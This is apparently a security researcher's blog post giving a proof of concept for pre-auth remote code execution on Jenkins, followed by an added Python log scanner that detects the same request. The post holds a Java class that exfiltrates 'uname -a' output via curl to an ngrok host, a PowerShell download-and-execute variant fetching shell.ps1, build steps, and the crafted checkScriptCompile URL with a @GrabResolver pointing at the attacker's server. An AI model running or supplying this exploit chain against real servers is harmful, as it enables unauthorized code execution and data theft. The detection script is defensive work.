Jenkins RCE PoC or simple pre-auth remote code execution on the Server.

http://example.com/jenkins/securityRealm/user/admin/
Jenkins User Id: admin
1. Saved that code as Orange.java:
public class Orange {
    public Orange() {
        try {
            String payload = "uname -a | curl -d @- http://myservertunnel.ngrok.io/";
            String[] cmds = {"/bin/bash", "-c", payload};
            java.lang.Runtime.getRuntime().exec(cmds);
        } catch (Exception e) { }
    }
}
uname -a | curl -d @- http://myservertunnel.ngrok.io/
javac -target 1.8 Orange.java
./Orange.java
./Orange.class
./META-INF
./META-INF/services
./META-INF/services/org.codehaus.groovy.plugins.Runners
Just a screenshot of all the required steps to make your PoC (without -target 1.8)
http://example.com/jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)
@GrabResolver(name='orange.tw', root='http://myservertunnel.ngrok.io/')
@Grab(group='tw.orange', module='poc', version='1')
import Orange;
{
    "column": 0,
    "line": 0,
    "message": "",
    "status": "success"
}
public class Orange {
    public Orange() {
        try {
            String payload = "powershell iex(new-object net.webclient).downloadstring('http://yourserver.com/shell.ps1')";
            String[] cmds = {"cmd", "/c", payload};
            java.lang.Runtime.getRuntime().exec(cmds);
        } catch (Exception e) { }
    }
}
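
A defender-side check for the checkScriptCompile request above, as an added example that is not part of the original post: it scans access-log lines for calls to that endpoint whose value parameter carries @Grab-family annotations and extracts the resolver root. The log layout, the sample lines, and the names inspect_line and scan are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and annotations are the ones in the request shown above.
ENDPOINT = re.compile(r"/descriptorByName/[^/]*CpsFlowDefinition/checkScriptCompile", re.I)
GRAB = re.compile(r"@Grab(?:Config|Resolver)?\b")
ROOT = re.compile(r"root\s*=\s*['\"]([^'\"]+)['\"]")
# Assumption: common/combined access-log layout, request line in double quotes.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (not from the original post).
_PATH = "/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /jenkins/login HTTP/1.1" 200 2041',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /jenkins/job/app' + _PATH
    + '?value=echo%20%27hi%27 HTTP/1.1" 200 58',
    '198.51.100.7 - - [01/Jan/2024:10:02:11 +0000] "GET /jenkins/securityRealm/user/admin'
    + _PATH + "?value=%40GrabConfig(disableChecksums%3Dtrue)%0A%40GrabResolver(name%3D%27x%27"
    "%2C%20root%3D%27http%3A%2F%2Fresolver.example%2F%27)%0A%40Grab(group%3D%27g%27%2C%20"
    'module%3D%27m%27%2C%20version%3D%271%27)%0Aimport%20Orange%3B HTTP/1.1" 200 61',
]


def inspect_line(line):
    """Return a finding if the line is a compile check carrying @Grab annotations, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    if not ENDPOINT.search(unquote(url.path)):
        return None
    # parse_qs percent-decodes, so %40Grab and a literal @Grab are treated alike.
    script = "\n".join(parse_qs(url.query).get("value", []))
    if not GRAB.search(script):
        return None
    return {
        "client": client, "status": int(status),
        "annotations": sorted(set(GRAB.findall(script))),
        "resolver_roots": ROOT.findall(script),  # hosts to look for in egress logs
    }


def scan(lines):
    return [f for f in map(inspect_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs hold only the request line, so this sees the script only when it travels in the query string, as it does in the request above. The extracted resolver roots are the hosts to search for in proxy or DNS logs.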


I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

Valeriy Shevchenko
